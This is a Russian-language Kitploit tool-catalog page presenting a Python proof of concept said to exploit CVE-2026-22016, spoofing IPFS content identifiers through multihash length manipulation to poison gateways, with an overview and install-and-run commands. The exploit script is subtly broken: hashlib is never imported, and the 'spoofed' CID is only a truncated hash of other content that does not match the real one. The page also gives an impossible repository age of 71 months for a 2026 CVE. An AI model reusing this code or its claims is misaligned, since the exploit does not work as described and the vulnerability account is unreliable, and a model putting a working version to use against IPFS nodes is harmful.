Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — Доказательство концепции на Python, демонстрирующее спуфинг CID в IPFS через расширение длины multihash и иллюстрирующее изъяны проверки адресации по содержимому, которые могут отравить шлюзы IPFS. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
Анализ уязвимостейЭксплуатацияАнализ хэшейВеб-безопасностьКриптографияСостязательная Атака
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

Доказательство концепции на Python, демонстрирующее спуфинг CID в IPFS через расширение длины multihash и иллюстрирующее изъяны проверки адресации по содержимому, которые могут отравить шлюзы IPFS.

Репозиторий
71 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-22016 – Подмена CID в IPFS через расширение длины multihash

Код программы (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – Подмена CID в IPFS через расширение длины multihash

Severity: High

Обзор

Реализация IPFS доверяет полю длины в multihash CID, не проверяя, что сам хеш соответствует полному содержимому. Злоумышленник может создать файл, усечённый хеш которого совпадает с префиксом хеша легитимного файла, и раздавать вредоносный файл под тем же CID.

Детали уязвимости

  • Тип: Подмена контента
  • Воздействие: Раздача вредоносного контента, отравление шлюзов IPFS.
  • Корневая причина: Механизм проверки CID не сверяет длину дайджеста с ожидаемым результатом хеш-функции.

Демонстрация эксплуатации

Запустите скрипт:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

Скрипт показывает, что можно сгенерировать поддельный CID.

Скачать инструмент